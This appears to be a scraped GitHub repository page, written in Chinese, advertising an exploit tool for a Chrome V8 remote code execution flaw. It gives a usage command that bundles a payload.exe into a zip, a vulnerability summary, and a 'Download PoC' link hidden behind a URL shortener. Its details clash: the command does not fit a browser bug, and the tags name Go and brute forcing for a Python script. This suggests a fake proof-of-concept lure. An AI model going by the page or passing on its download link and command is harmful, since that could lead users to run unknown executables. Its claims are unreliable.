NetVanguard-cmd/CVE-2026-4447

GitHub: NetVanguard-cmd/CVE-2026-4447

针对 CVE-2026-4447 的利用工具,演示 V8 沙箱逃逸的 PoC 实现与验证。

Stars: 0 | Forks: 0

# CVE-2026-4447 - V8 在 Google Chrome 远程代码执行之前的版本 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用说明 - **严重性:** 高 - **CVSS:** 8.8 - **影响:** 机密性、完整性、可用性 - **发布日期:** 2026-03-20 ## 技术摘要 在 Google Chrome 146.0.7680.153 之前的 V8 版本中,存在不恰当的实现方式,允许远程攻击者通过精心设计的 HTML 页面在沙箱环境中执行任意代码。(Chromium 安全严重性:高) ## 受影响的版本 **Google Chrome:** - 146.0.7680.153 之前版本 ## 参考链接 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-4447 ## 利用工具 [下载 PoC](https://tinyurl.com/2dqd8mhg)
标签:2026, Chromium, CVE-2026-4447, CVSS 8.8, Google Chrome, Go语言工具, HTML 攻击, PoC, RCE, V8, 代码执行, 可用性, 威胁模拟, 完整性, 暴力破解, 机密性, 沙盒逃逸, 漏洞披露, 编程工具, 远程代码执行, 远程攻击, 逆向工具, 高危漏洞